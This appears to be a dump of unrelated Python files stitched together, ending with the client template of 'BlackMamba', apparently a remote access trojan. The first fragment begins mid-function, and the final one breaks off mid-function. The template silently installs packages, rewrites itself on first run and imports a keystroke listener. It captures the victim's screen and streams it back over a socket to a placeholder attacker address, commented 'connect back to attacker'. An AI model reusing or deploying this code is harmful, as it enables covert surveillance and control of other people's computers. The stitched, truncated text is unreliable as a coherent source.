2, 1, figsize=(10, 10),
gridspec_kw={'height_ratios': [0.1, 0.4]})
i = 0
axes[i].imshow(states[None, slice(*slc)], aspect='auto', cmap='tab20b')
axes[i].set_xticks([])
axes[i].set_yticks([])
axes[i].set_title('State')
# if state_probs is not None:
# i += 1
# n_states = state_probs.shape[1]
# xs_ = [np.arange(slc[0], slc[1]) for _ in range(n_states)]
# ys_ = [state_probs[slice(*slc), j] for j in range(n_states)]
# cs_ = [j for j in range(n_states)]
# _multiline(xs_, ys_, ax=axes[i], c=cs_, alpha=0.8, cmap='tab20b', lw=3)
# axes[i].set_xticks([])
# axes[i].set_xlim(slc[0], slc[1])
# axes[i].set_yticks([])
# axes[i].set_ylim(-0.1, 1.1)
# axes[i].set_title('State probabilities')
i += 1
behavior = m * latents / np.max(np.abs(latents)) + \
np.arange(latents.shape[1])
axes[i].plot(np.arange(slc[0], slc[1]), behavior[slice(*slc), :])
axes[i].set_xticks([])
axes[i].set_xlim(slc[0], slc[1])
axes[i].set_yticks([])
axes[i].set_ylim(0, n_dlc_comp + 1)
axes[-1].set_xlabel('Time (bins)')
plt.tight_layout()
plt.show()
return fig
|
#! /usr/bin/env python
# --coding:utf-8--
# coding: utf-8
# ━━━━━━ Divine Beast Crossing ━━━━━━
# ┏┓ ┏┓
# ┏┛┻━━━┛┻┓
# ┃ ┃
# ┃ ━ ┃
# ┃ ┳┛ ┗┳ ┃
# ┃ ┃
# ┃ ┻ ┃
# ┃ ┃
# ┗━┓ ┏━┛
# ┃    ┃ May the divine beast bless us: no bugs, ever!
# ┃ ┃Code is far away from bug with the animal protecting
# ┃ ┗━━━┓
# ┃ ┣┓
# ┃ ┏┛
# ┗┓┓┏━┳┓┏┛
# ┃┫┫ ┃┫┫
# ┗┻┛ ┗┻┛
# ━━━━━━ So adorable ━━━━━━
# Module Desc:clover
# User: z.mm | [email protected]
# Date: 2016/1/20
# Time: 14:58
from web.service.CheckService import CheckService
__author__ = 'Administrator'
class MysqlTask(object):
    def __init__(self, serverId, port, host):
self.host = host
self.port = port
self.serverId=serverId
self.c = CheckService()
def check(self):
data = self.c.mysqlCheck(self.host, port=self.port)
key = str(self.serverId)+":"+self.host +":"+ self.port +":mysql"
CheckService.checkStatue[key] = data
# print MysqlTask(2,"3306","127.0.0.1").check() |
from math import pi, radians
import socket
import struct
import pigpio  # used by the Servo class below; missing from the original imports
import find_sun
import test_light_system as ls
VIEWER_ADDR = ('172.16.164.208', 43521)
class Servo:
def __init__(self, pin=18, minval=520, maxval=2240, wincount=8):
self.pi = pigpio.pi()
self.pin = pin
self.minval = minval
self.maxval = maxval
self.wincount = wincount
def setwindow(self, number):
value = self.minval + (self.maxval - self.minval) / (self.wincount - 1) * number
self.pi.set_servo_pulsewidth(self.pin, value)
    def setangle(self, angle):
        # Map an angle in [0, 2*pi) linearly onto the [minval, maxval] pulse-width range.
        angle %= 2 * pi
        value = self.minval + (self.maxval - self.minval) * angle / (2 * pi)
        self.pi.set_servo_pulsewidth(self.pin, value)
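# Worked example for Servo.setangle (assuming the default minval=520 and maxval=2240 above):
# an angle of pi radians maps to 520 + (2240 - 520) * pi / (2 * pi) = 520 + 860 = 1380,
# i.e. a pulse width in the middle of the servo's range.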
if __name__ == "__main__":
ss = find_sun.Sun_seeker()
sock = socket.socket()
sock.connect(VIEWER_ADDR)
Servo1 = Servo(pin=17) #TODO define min and max val precisely
Servo2 = Servo(pin=18)
while True:
direction = ss.get_sun_vector()
sock.send(struct.pack('<3f', *direction))
direction = ls.dekart_to_euler(direction)
Servo1.setangle(radians(direction[0]))
Servo2.setangle(radians(direction[1])) |
from .get_links_directly import get_links_directly
from .get_links_using_Google_search import get_links_using_Google_search
from .find_links_by_extension import find_links_by_extension
|
import logging
from datetime import date, datetime, timedelta
import redis
from integration_tests.utils import populate_mock_db
from sqlalchemy.sql.expression import or_
from src.challenges.challenge_event_bus import ChallengeEvent, ChallengeEventBus
from src.challenges.trending_challenge import (
should_trending_challenge_update,
trending_playlist_challenge_manager,
trending_track_challenge_manager,
trending_underground_track_challenge_manager,
)
from src.models import TrendingResult
from src.models.models import Challenge, UserChallenge
from src.tasks.calculate_trending_challenges import enqueue_trending_challenges
from src.tasks.index_aggregate_plays import _update_aggregate_plays
from src.trending_strategies.trending_strategy_factory import TrendingStrategyFactory
from src.trending_strategies.trending_type_and_version import TrendingType
from src.utils.config import shared_config
from src.utils.db_session import get_db
REDIS_URL = shared_config["redis"]["url"]
BLOCK_NUMBER = 10
logger = logging.getLogger(__name__)
trending_strategy_factory = TrendingStrategyFactory()
def test_trending_challenge_should_update(app):
with app.app_context():
db = get_db()
with db.scoped_session() as session:
# ========== Test timestamp w/out trending result in DB ==========
# If the timestamp is outside of threshold and nothing in db
# Wrong time, wrong day
timestamp = 1629132028
should_update, timestamp = should_trending_challenge_update(session, timestamp)
assert not should_update
# Right time, wrong day
timestamp = 1629140400
should_update, timestamp = should_trending_challenge_update(session, timestamp)
assert not should_update
# wrong time, right day
timestamp = 1629489600
should_update, timestamp = should_trending_challenge_update(session, timestamp)
assert not should_update
# Within bounds
timestamp = 1629486000
should_update, timestamp = should_trending_challenge_update(session, timestamp)
assert should_update
# ========== Test working timestamp with trending result in DB ==========
session.add(
TrendingResult(
user_id=1,
rank=1,
id="1",
type="tracks",
version="ePWJD",
week="2021-08-20",
)
)
session.flush()
# Test same date as inserted trending result, so return false
timestamp = 1629486000
should_update, timestamp = should_trending_challenge_update(session, timestamp)
assert not should_update
# Test week after inserted trending result, so return true
timestamp = 1630090800
should_update, timestamp = should_trending_challenge_update(session, timestamp)
assert should_update
def test_trending_challenge_job(app):
with app.app_context():
db = get_db()
redis_conn = redis.Redis.from_url(url=REDIS_URL)
test_entities = {
"tracks": [
{"track_id": 1, "owner_id": 1},
{"track_id": 2, "owner_id": 2},
{"track_id": 3, "owner_id": 3},
{"track_id": 4, "owner_id": 4},
{"track_id": 5, "owner_id": 5},
{"track_id": 6, "owner_id": 2},
{"track_id": 7, "owner_id": 3},
{"track_id": 8, "owner_id": 3},
{"track_id": 9, "is_unlisted": True, "owner_id": 3},
{"track_id": 11, "owner_id": 1},
{"track_id": 12, "owner_id": 2},
{"track_id": 13, "owner_id": 3},
{"track_id": 14, "owner_id": 4},
{"track_id": 15, "owner_id": 5},
],
"playlists": [
{
"playlist_id": 1,
"playlist_owner_id": 1,
"playlist_name": "name",
"description": "description",
"playlist_contents": {
"track_ids": [
{"track": 1, "time": 1},
{"track": 2, "time": 2},
{"track": 3, "time": 3},
]
},
},
{
"playlist_id": 2,
"playlist_owner_id": 2,
"playlist_name": "name",
"description": "description",
"playlist_contents": {
"track_ids": [
{"track": 1, "time": 1},
{"track": 2, "time": 2},
{"track": 3, "time": 3},
]
},
},
{
"playlist_id": 3,
"is_album": True,
"playlist_owner_id": 3,
"playlist_name": "name",
"description": "description",
"playlist_contents": {
"track_ids": [
{"track": 1, "time": 1},
{"track": 2, "time": 2},
{"track": 3, "time": 3},
]
},
},
{
"playlist_id": 4,
"playlist_owner_id": 4,
"playlist_name": "name",
"description": "description",
"playlist_contents": {
"track_ids": [
{"track": 1, "time": 1},
{"track": 2, "time": 2},
{"track": 3, "time": 3},
]
},
},
{
"playlist_id": 5,
"playlist_owner_id": 5,
"playlist_name": "name",
"description": "description",
"playlist_contents": {
"track_ids": [
{"track": 1, "time": 1},
{"track": 2, "time": 2},
{"track": 3, "time": 3},
]
},
},
],
"users": [
{"user_id": 1, "handle": "user1"},
{"user_id": 2, "handle": "user2"},
{"user_id": 3, "handle": "user3"},
{"user_id": 4, "handle": "user4"},
{"user_id": 5, "handle": "user5"},
],
"follows": [
{
"follower_user_id": 1,
"followee_user_id": 2,
"created_at": datetime.now() - timedelta(days=8),
},
{
"follower_user_id": 1,
"followee_user_id": 3,
"created_at": datetime.now() - timedelta(days=8),
},
{
"follower_user_id": 2,
"followee_user_id": 3,
"created_at": datetime.now() - timedelta(days=8),
},
{
"follower_user_id": 2,
"followee_user_id": 4,
"created_at": datetime.now() - timedelta(days=8),
},
{
"follower_user_id": 3,
"followee_user_id": 6,
"created_at": datetime.now() - timedelta(days=8),
},
{
"follower_user_id": 4,
"followee_user_id": 5,
"created_at": datetime.now() - timedelta(days=8),
},
{
"follower_user_id": 5,
"followee_user_id": 1,
"created_at": datetime.now() - timedelta(days=8),
},
{
"follower_user_id": 6,
"followee_user_id": 3,
"created_at": datetime.now() - timedelta(days=8),
},
],
"reposts": [
{"repost_item_id": 1, "repost_type": "track", "user_id": 2},
{"repost_item_id": 1, "repost_type": "playlist", "user_id": 2},
{"repost_item_id": 3, "repost_type": "track", "user_id": 3},
{"repost_item_id": 1, "repost_type": "playlist", "user_id": 3},
{"repost_item_id": 4, "repost_type": "track", "user_id": 1},
{"repost_item_id": 5, "repost_type": "track", "user_id": 1},
{"repost_item_id": 6, "repost_type": "track", "user_id": 1},
],
"saves": [
{"save_item_id": 1, "save_type": "track", "user_id": 2},
{"save_item_id": 1, "save_type": "track", "user_id": 3},
{"save_item_id": 4, "save_type": "track", "user_id": 1},
{"save_item_id": 5, "save_type": "track", "user_id": 1},
{"save_item_id": 6, "save_type": "track", "user_id": 1},
{"save_item_id": 1, "save_type": "playlist", "user_id": 4},
{"save_item_id": 2, "save_type": "playlist", "user_id": 3},
{"save_item_id": 3, "save_type": "playlist", "user_id": 2},
{"save_item_id": 4, "save_type": "playlist", "user_id": 1},
{"save_item_id": 5, "save_type": "playlist", "user_id": 2},
],
"plays": [{"item_id": 1} for _ in range(55)]
+ [{"item_id": 2} for _ in range(60)]
+ [{"item_id": 3} for _ in range(70)]
+ [{"item_id": 4} for _ in range(90)]
+ [{"item_id": 5} for _ in range(80)]
+ [{"item_id": 6} for _ in range(40)]
+ [{"item_id": 11} for _ in range(200)]
+ [{"item_id": 12} for _ in range(200)]
+ [{"item_id": 13} for _ in range(200)]
+ [{"item_id": 14} for _ in range(200)]
+ [{"item_id": 15} for _ in range(200)],
}
populate_mock_db(db, test_entities, BLOCK_NUMBER + 1)
bus = ChallengeEventBus(redis_conn)
# Register events with the bus
bus.register_listener(
ChallengeEvent.trending_underground,
trending_underground_track_challenge_manager,
)
bus.register_listener(
ChallengeEvent.trending_track, trending_track_challenge_manager
)
bus.register_listener(
ChallengeEvent.trending_playlist, trending_playlist_challenge_manager
)
trending_date = date.fromisoformat("2021-08-20")
with db.scoped_session() as session:
_update_aggregate_plays(session)
session.execute("REFRESH MATERIALIZED VIEW aggregate_track")
session.execute("REFRESH MATERIALIZED VIEW aggregate_interval_plays")
session.execute("REFRESH MATERIALIZED VIEW trending_params")
trending_track_versions = trending_strategy_factory.get_versions_for_type(
TrendingType.TRACKS
).keys()
for version in trending_track_versions:
strategy = trending_strategy_factory.get_strategy(
TrendingType.TRACKS, version
)
if strategy.use_mat_view:
strategy.update_track_score_query(session)
session.commit()
enqueue_trending_challenges(db, redis_conn, bus, trending_date)
with db.scoped_session() as session:
session.query(Challenge).filter(
or_(
Challenge.id == "trending-playlist",
Challenge.id == "trending-track",
Challenge.id == "trending-underground-track",
)
).update({"active": True, "starting_block": BLOCK_NUMBER})
bus.process_events(session)
session.flush()
trending_tracks = (
session.query(TrendingResult)
.filter(TrendingResult.type == str(TrendingType.TRACKS))
.all()
)
assert len(trending_tracks) == 5
user_trending_tracks_challenges = (
session.query(UserChallenge)
.filter(UserChallenge.challenge_id == "trending-track")
.all()
)
assert len(user_trending_tracks_challenges) == 5
ranks = {
"2021-08-20:1",
"2021-08-20:2",
"2021-08-20:3",
"2021-08-20:4",
"2021-08-20:5",
}
for challenge in user_trending_tracks_challenges:
assert challenge.specifier in ranks
ranks.remove(challenge.specifier)
trending_playlists = (
session.query(TrendingResult)
.filter(TrendingResult.type == str(TrendingType.PLAYLISTS))
.all()
)
assert len(trending_playlists) == 5
|
"""
implementation of criteo dataset
"""
# pylint: disable=unused-argument,missing-docstring
import os
import sys
import re
import random
import numpy as np
from intel_pytorch_extension import core
import inspect
# pytorch
import torch
from torch.utils.data import Dataset, RandomSampler
# add dlrm code path
try:
dlrm_dir_path = os.environ['DLRM_DIR']
sys.path.append(dlrm_dir_path)
except KeyError:
print("ERROR: Please set DLRM_DIR environment variable to the dlrm code location")
sys.exit(0)
#import dataset
import dlrm_data_pytorch as dp
import data_loader_terabyte
class CriteoCalib(Dataset):
def __init__(self,
data_path,
name,
test_num_workers=0,
max_ind_range=-1,
mlperf_bin_loader=False,
sub_sample_rate=0.0,
randomize="total",
memory_map=False):
super().__init__()
self.random_offsets = []
self.use_fixed_size = True
# fixed size queries
self.samples_to_aggregate = 1
if name == "kaggle":
raw_data_file = data_path + "/train.txt"
processed_data_file = data_path + "/kaggleAdDisplayChallenge_processed.npz"
elif name == "terabyte":
raw_data_file = data_path + "/day"
processed_data_file = data_path + "/terabyte_processed.npz"
else:
raise ValueError("only kaggle|terabyte dataset options are supported")
self.use_mlperf_bin_loader = mlperf_bin_loader and memory_map and name == "terabyte"
if self.use_mlperf_bin_loader:
cal_data_file = os.path.join(data_path, 'calibration.npz')
if os.path.isfile(cal_data_file):
print("Found calibration.npz !!")
self.cal_loader = data_loader_terabyte.CalibDataLoader(
data_filename=cal_data_file,
batch_size=1,
)
else:
counts_file = raw_data_file + '_fea_count.npz'
validate_file = data_path + "/terabyte_processed_val.bin"
if os.path.exists(validate_file):
print("Found terabyte_processed_val.bin !!")
self.val_data = data_loader_terabyte.CriteoBinDataset(
data_file=validate_file,
counts_file=counts_file,
batch_size=self.samples_to_aggregate,
max_ind_range=max_ind_range
)
self.val_loader = torch.utils.data.DataLoader(
self.val_data,
batch_size=None,
batch_sampler=None,
shuffle=False,
num_workers=0,
collate_fn=None,
pin_memory=False,
drop_last=False,
)
self.cal_loader = self.val_loader
else:
self.cal_loader = None
else:
self.val_data = dp.CriteoDataset(
dataset=name,
max_ind_range=max_ind_range,
sub_sample_rate=sub_sample_rate,
randomize=randomize,
split="val",
raw_path=raw_data_file,
pro_data=processed_data_file,
memory_map=memory_map
)
self.val_loader = torch.utils.data.DataLoader(
self.val_data,
batch_size=self.samples_to_aggregate,
shuffle=False,
num_workers=test_num_workers,
collate_fn=dp.collate_wrapper_criteo,
pin_memory=False,
drop_last=False,
)
self.cal_loader = self.val_loader
def get_calibration_data_loader(self):
return self.cal_loader
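# A minimal usage sketch (illustrative only).  The data path and loader options below are
# assumptions; DLRM_DIR must point at the dlrm code as required above.
if __name__ == "__main__":
    calib_ds = CriteoCalib(
        data_path="/data/criteo",      # hypothetical location of the pre-processed data
        name="terabyte",
        mlperf_bin_loader=True,
        memory_map=True)
    loader = calib_ds.get_calibration_data_loader()
    if loader is not None:
        for i, batch in enumerate(loader):
            print("calibration batch", i)
            if i >= 2:                 # only peek at a few batches
                break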
|
from disnake.ext import commands
class ErrorHandler(commands.Cog):
"""A cog for global error handling."""
def __init__(self, bot: commands.Bot):
self.bot = bot
@commands.Cog.listener()
async def on_command_error(
self, ctx: commands.Context, error: commands.CommandError
):
"""A global error handler cog."""
if isinstance(error, commands.CommandNotFound):
return # Return because we don't want to show an error for every command not found
elif isinstance(error, commands.CommandOnCooldown):
message = f"This command is on cooldown. Please try again after {round(error.retry_after, 1)} seconds."
elif isinstance(error, commands.MissingPermissions):
message = "You are missing the required permissions to run this command!"
elif isinstance(error, commands.UserInputError):
message = "Something about your input was wrong, please check your input and try again!"
elif isinstance(error, commands.NoPrivateMessage):
message = "This command cannot be run in a Private Message!"
else:
message = "Oh no! Something went wrong while running the command!"
await ctx.send(message)
def setup(bot: commands.Bot):
bot.add_cog(ErrorHandler(bot))
|
import matplotlib
import subprocess
import matplotlib.pyplot as plt
import numpy as np
time_gpu = {}
time_cpu = {}
generate = './generate_dataset.py'
par = './../cpp/kmean-par'
seq = './../cpp/kmean-seq'
file_input = 'points_'
for k in range(100, 510, 100):
time_cpu[k] = {}
time_gpu[k] = {}
for n in range(100000, 1000001, 200000):
filename = file_input
subprocess.call(['python3', 'generate_dataset.py', '-n', str(n), '-k', str(k), '-o', filename, '-r', '10', '-v', '20'])
output = subprocess.check_output([seq, '-o', 'res', '-i', filename, '-k', str(k)]).decode('utf8').split('\n')
time_c = int(output[-2])
output = subprocess.check_output([par, '-o', 'res', '-i', filename, '-k', str(k)]).decode('utf8').split('\n')
time_p = int(output[-2])
time_cpu[k][n] = time_c
time_gpu[k][n] = time_p
file = ""
for k in range(100, 510, 100):
for n in range(100000, 1000001, 200000):
file += "k: " + str(k) + " n: " + str(n) + " seq: " + str(time_cpu[k][n]) + " par: " + str(time_gpu[k][n]) + "\n"
f = open('results', 'w')
f.write(file)
# Scale n
x1, y1 = zip(*sorted(time_gpu[500].items()))
x2, y2 = zip(*sorted(time_cpu[500].items()))
fig, ax = plt.subplots()
print(len(time_gpu))
print(len(time_gpu[500]))
ax.plot(x1, y1)
ax.plot(x2, y2)
ax.set(xlabel='Number of data points', ylabel='Execution time')
#plt.show()
plt.savefig('scale_n.png')
# Scale k
fig, ax = plt.subplots()
new = [(k, v[500000]) for k, v in time_gpu.items()]
x, y = zip(*sorted(new))
ax.set(xlabel='Number of clusters', ylabel='Execution time')
ax.plot(x, y)
#plt.show()
plt.savefig('scale_k.png')
# heat map
m = np.zeros((6, 6))
for k, v in sorted(time_gpu.items()):
for k2, v2 in sorted(v.items()):
        m[k // 100][k2 // 200000] = (1.0 * time_cpu[k][k2]) / v2
#m.append(((k, k2), v2 / (1.0 * time_cpu[k][k2])))
print(m[1:,1:])
plt.imshow(m[1:,1:], cmap='hot', interpolation='nearest')
plt.colorbar()
plt.xticks(range(0, 5), range(100, 510, 100))
plt.yticks(range(0, 5), range(100000, 1000001, 200000))
#plt.show()
plt.savefig('map.png')
# K discovery
subprocess.call(['python3', 'generate_dataset.py', '-n', '500000', '-k', '50', '-o', file_input, '-r', '10', '-v', '20'])
output = subprocess.check_output([seq, '-o', 'res', '-i', file_input, '-a', '-m', '5', '-M', '100', '-s', '2']).decode('utf8').split('\n')
time_c = int(output[-2])
output = subprocess.check_output([par, '-o', 'res', '-i', file_input, '-a', '-m', '5', '-M', '100', '-s', '2']).decode('utf8').split('\n')
time_p = int(output[-2])
print('speedup : ' + str(time_c / (1.0 * time_p))) |
import aspose.slides as slides
def charts_set_data_range():
#ExStart:SetDataRange
# The path to the documents directory.
outDir = "./examples/out/"
dataDir = "./examples/data/"
# Instantiate Presentation class that represents PPTX file
with slides.Presentation(dataDir + "charts_with_external_workbook.pptx") as presentation:
        # Access the first slide and get its chart shape
slide = presentation.slides[0]
chart = slide.shapes[0]
chart.chart_data.set_range("Sheet1!A1:B4")
presentation.save(outDir + "charts_set_data_range_out.pptx", slides.export.SaveFormat.PPTX)
#ExEnd:SetDataRange |
#!/usr/bin/python3
""" ===================================================================================================================
|
| Name : roll_the_dice.py
| Project : diceware
| Copyright : burrwebb
| License : Apache-2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt)
| Description :
|
=================================================================================================================== """
import argparse
from diceware import Diceware
def main():
diceware = Diceware()
parser = argparse.ArgumentParser(description='Generate passphrases with Diceware!')
parser.add_argument('-l', '--length', help='Desired length of passphrase', default=6, type=int)
parser.add_argument('-n', '--num_phrases', help='Number of passphrases', default=1, type=int)
args = parser.parse_args()
length = args.length
num_phrases = args.num_phrases
list_of_phrases = diceware.generate_multiple(length_of_phrases=length, number_of_phrases=num_phrases)
print()
print("Your new passphrase(s):")
print("----------------------------")
for phrase in list_of_phrases:
print(phrase)
print()
# execute the script
if __name__ == "__main__":
main()
"""
Copyright 2019 burrwebb
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
|
"""Treadmill metrics collector.
Collects Treadmill metrics and sends them to Graphite.
"""
import glob
import logging
import os
import time
import click
from treadmill import appenv
from treadmill import exc
from treadmill import fs
from treadmill import rrdutils
from treadmill.metrics import rrd
#: Metric collection interval (every X seconds)
_METRIC_STEP_SEC_MIN = 15
_METRIC_STEP_SEC_MAX = 300
_LOGGER = logging.getLogger(__name__)
def _core_svcs(root_dir):
"""Contructs list of core services."""
return sorted([
os.path.basename(s)
for s in glob.glob(os.path.join(root_dir, 'init', '*'))
if not (s.endswith('.out') or s.endswith('.err'))])
def init():
"""Top level command handler."""
# TODO: main is too long, need to be refactored.
#
# pylint: disable=R0915
@click.command()
@click.option('--step', '-s',
type=click.IntRange(_METRIC_STEP_SEC_MIN,
_METRIC_STEP_SEC_MAX),
default=_METRIC_STEP_SEC_MIN,
help='Metrics collection frequency (sec)')
@click.option('--approot', type=click.Path(exists=True),
envvar='TREADMILL_APPROOT', required=True)
def metrics(step, approot):
"""Collect node and container metrics."""
tm_env = appenv.AppEnvironment(root=approot)
app_metrics_dir = os.path.join(tm_env.metrics_dir, 'apps')
core_metrics_dir = os.path.join(tm_env.metrics_dir, 'core')
fs.mkdir_safe(app_metrics_dir)
fs.mkdir_safe(core_metrics_dir)
interval = int(step) * 2
rrdclient = rrdutils.RRDClient('/tmp/treadmill.rrd')
# Initiate the list for monitored applications
monitored_apps = set(
os.path.basename(metric_name)[:-len('.rrd')]
for metric_name in glob.glob('%s/*' % app_metrics_dir)
if metric_name.endswith('.rrd')
)
sys_svcs = _core_svcs(approot)
sys_svcs_no_metrics = set()
sys_maj_min = '{}:{}'.format(*fs.path_to_maj_min(approot))
sys_block_dev = fs.maj_min_to_blk(*fs.path_to_maj_min(approot))
_LOGGER.info('Device %s maj:min = %s for approot: %s', sys_block_dev,
sys_maj_min, approot)
core_rrds = ['treadmill.apps.rrd',
'treadmill.core.rrd',
'treadmill.system.rrd']
for core_rrd in core_rrds:
rrdfile = os.path.join(core_metrics_dir, core_rrd)
if not os.path.exists(rrdfile):
rrdclient.create(rrdfile, step, interval)
while True:
starttime_sec = time.time()
rrd.update(
rrdclient,
os.path.join(core_metrics_dir, 'treadmill.apps.rrd'),
'treadmill/apps', sys_maj_min, sys_block_dev
)
rrd.update(
rrdclient,
os.path.join(core_metrics_dir, 'treadmill.core.rrd'),
'treadmill/core', sys_maj_min, sys_block_dev
)
rrd.update(
rrdclient,
os.path.join(core_metrics_dir, 'treadmill.system.rrd'),
'treadmill', sys_maj_min, sys_block_dev
)
count = 3
for svc in sys_svcs:
if svc in sys_svcs_no_metrics:
continue
rrdfile = os.path.join(core_metrics_dir,
'{svc}.rrd'.format(svc=svc))
if not os.path.exists(rrdfile):
rrdclient.create(rrdfile, step, interval)
svc_cgrp = os.path.join('treadmill', 'core', svc)
rrd.update(rrdclient, rrdfile, svc_cgrp, sys_maj_min,
sys_block_dev)
count += 1
seen_apps = set()
for app_dir in glob.glob('%s/*' % tm_env.apps_dir):
if not os.path.isdir(app_dir):
continue
app_unique_name = os.path.basename(app_dir)
seen_apps.add(app_unique_name)
try:
localdisk = tm_env.svc_localdisk.get(app_unique_name)
blkio_major_minor = '{major}:{minor}'.format(
major=localdisk['dev_major'],
minor=localdisk['dev_minor'],
)
block_dev = localdisk['block_dev']
except (exc.TreadmillError, IOError, OSError):
blkio_major_minor = None
block_dev = None
rrd_file = os.path.join(
app_metrics_dir, '{app}.rrd'.format(app=app_unique_name))
if not os.path.exists(rrd_file):
rrdclient.create(rrd_file, step, interval)
app_cgrp = os.path.join('treadmill', 'apps', app_unique_name)
rrd.update(rrdclient, rrd_file, app_cgrp, blkio_major_minor,
block_dev)
count += 1
for app_unique_name in monitored_apps - seen_apps:
# Removed metrics for apps that are not present anymore
rrd_file = os.path.join(
app_metrics_dir, '{app}.rrd'.format(app=app_unique_name))
_LOGGER.info('removing %r', rrd_file)
rrdclient.forget(rrd_file)
os.unlink(rrd_file)
monitored_apps = seen_apps
second_used = time.time() - starttime_sec
_LOGGER.info('Got %d cgroups metrics in %.3f seconds',
count, second_used)
if step > second_used:
time.sleep(step - second_used)
        # Graceful shutdown.
_LOGGER.info('service shutdown.')
return metrics
|
import testaid
testinfra_hosts = testaid.hosts()
def test_testaid_ruby_role_curl_install_packages_installed(host, testvars):
curl_packages = testvars['curl_packages']
for debian_package in curl_packages:
deb = host.package(debian_package)
assert deb.is_installed
|
#pylint: disable=import-error
from machine import Pin, SPI
from input import DigitalInput
import display
import m5stack
#pylint: enable=import-error
#TODO: does not handle multiple initialisations
if 'tft' not in dir():
    tft = m5stack.Display()
# Usage: tft.image(x, y, file [, scale, type])
|
import requests
from datetime import datetime, timedelta
def get_average_prices(currency, start_date, end_date):
""" Returns the average price per day for this currency between the two dates.
start_date and end_date must be datetime objects """
    # Ex: https://poloniex.com/public?command=returnChartData&currencyPair=BTC_ETH&start=1515163043&end=1517755043&period=86400
# Period is in seconds. 86400 = 24 hours.
params = (('command', 'returnChartData'), ('currencyPair', currency), ('start', int(start_date.timestamp())), ('end', int(end_date.timestamp())), ('period', '86400'))
r = requests.post('https://poloniex.com/public', params=params)
return r.json()
def get_currencies_data(currencies_list):
colors = ["#8e5ea2", "#3e95cd", "#3cba9f", "#c45850", "#e8c3b9"]
# Currently displaying data on the last 30 days
days = 30
end_date = datetime.now()
start_date = end_date - timedelta(days=days)
times = []
times.append(start_date.strftime('%Y/%m/%d'))
for date in range(days + 1):
times.append((start_date + timedelta(days=date)).strftime('%Y/%m/%d'))
currencies_data = {}
for i, curr in enumerate(currencies_list):
get_currency_data(curr, currencies_data, colors[i % len(colors)], start_date, end_date)
return times, currencies_data
def get_currency_data(currency, currencies_data, color, start_date, end_date):
prices_json = get_average_prices(currency, start_date, end_date)
prices = []
for price in prices_json:
prices.append(price['weightedAverage'])
currencies_data[currency] = {}
currencies_data[currency]['values'] = prices
currencies_data[currency]['color'] = color
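# A minimal usage sketch (not part of the original module): fetch the last 30 days
# of weighted-average prices for a couple of Poloniex pairs and print the date range
# and per-currency series. The pair names below are illustrative examples.
if __name__ == '__main__':
    times, data = get_currencies_data(['BTC_ETH', 'BTC_LTC'])
    print(times[0], '->', times[-1])
    for pair, info in data.items():
        print(pair, info['color'], len(info['values']), 'data points')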
|
####################################################################################
# BLACKMAMBA BY: LOSEYS (https://github.com/loseys)
#
# QT GUI INTERFACE BY: WANDERSON M.PIMENTA (https://github.com/Wanderson-Magalhaes)
# ORIGINAL QT GUI: https://github.com/Wanderson-Magalhaes/Simple_PySide_Base
####################################################################################
"""
It is a base to create te Python file that will be executed in the client host. Some
terms of "body_script" will be replaced:
SERVER_IP
SERVER_PORT
SERVER_V_IP
CLIENT_TAG
SERVER_KEY
"""
body_script = r"""#!/usr/bin/python3
import os
import sys
import time
import random
import platform
from os import environ
environ['PYGAME_HIDE_SUPPORT_PROMPT'] = '1'
first_execution = True
system_os = platform.platform().lower()
if 'linux' in str(platform.platform()).lower():
if not 'screen on' in str(os.popen('screen -ls')).lower():
os.environ["QT_QPA_PLATFORM"] = "offscreen"
if first_execution:
if 'linux' in system_os:
os.system(f'chmod 777 {os.path.basename(__file__)}')
os.system('pip3 install requests')
os.system('pip3 install Pillow')
os.system('pip3 install pyautogui')
os.system('pip3 install wmi')
os.system('pip3 install pytest-shutil')
os.system('pip3 install cv2')
os.system('pip3 install pynput')
os.system('pip3 install PyQt5')
os.system('pip3 install PyAutoGUI')
os.system('pip3 install cryptography')
os.system('pip3 install opencv-python')
os.system('pip3 install mss')
os.system('pip3 install pygame')
os.system('pip3 install numpy')
elif 'windows' in system_os:
os.system('pip install Pillow')
os.system('pip install requests')
os.system('pip install pyautogui')
os.system('pip install wmi')
os.system('pip install pytest-shutil')
os.system('pip install cv2')
os.system('pip install pynput')
os.system('pip install PyQt5')
os.system('pip install PyAutoGUI')
os.system('pip install cryptography')
os.system('pip install opencv-python')
os.system('pip install mss')
os.system('pip install pygame')
os.system('pip install numpy')
client_tag_nb = (random.randint(int('1' + '0' * 30), int('9' + '0' * 30)))
with open(os.path.basename(__file__), 'r') as f:
_content = f.read()
f.close()
with open(os.path.basename(__file__), 'w') as f:
_content = _content.replace('first_execution = True', 'first_execution = False')
_content = _content.replace('client_tag = 0', f'client_tag = {client_tag_nb}')
f.write(_content)
f.close()
os.execl(sys.executable, os.path.abspath(__file__), *sys.argv)
import re
import time
import time
import uuid
import socket
import shutil
import select
import pathlib
import requests
import threading
import subprocess
import numpy as np
from mss import mss
from threading import Thread
import pygame
from zlib import compress
from cryptography.fernet import Fernet
try:
import pyautogui
except:
#print(1)
pass
try:
from pynput.keyboard import Listener
except:
pass
try:
import cv2
except:
pass
try:
from PyQt5 import QtWidgets
except:
#print(2)
pass
ip = 'SERVER_IP'
port = SERVER_PORT
port_video = SERVER_V_IP
client_tag = 0
status_strm = True
try:
pyautogui.FAILSAFE = False
except:
#print(3)
pass
try:
app = QtWidgets.QApplication(sys.argv)
screen = app.primaryScreen()
size = screen.size()
WIDTH = size.width()
HEIGHT = size.height()
except:
#print(4)
pass
def retreive_screenshot(conn):
global status_strm
with mss() as sct:
# The region to capture
rect = {'top': 0, 'left': 0, 'width': WIDTH, 'height': HEIGHT}
while True:
try:
# Capture the screen
img = sct.grab(rect)
# Tweak the compression level here (0-9)
pixels = compress(img.rgb, 6)
# Send the size of the pixels length
size = len(pixels)
size_len = (size.bit_length() + 7) // 8
conn.send(bytes([size_len]))
# Send the actual pixels length
size_bytes = size.to_bytes(size_len, 'big')
conn.send(size_bytes)
# Send pixels
conn.sendall(pixels)
except:
# print('except_from_thread_streaming')
#print(5)
status_strm = False
break
def main(host=ip, port=port_video):
try:
global status_strm
''' connect back to attacker on port'''
sock = socket.socket()
sock.connect((host, port))
sock.send(f'{WIDTH},{HEIGHT}'.encode())
except:
#print(6)
return
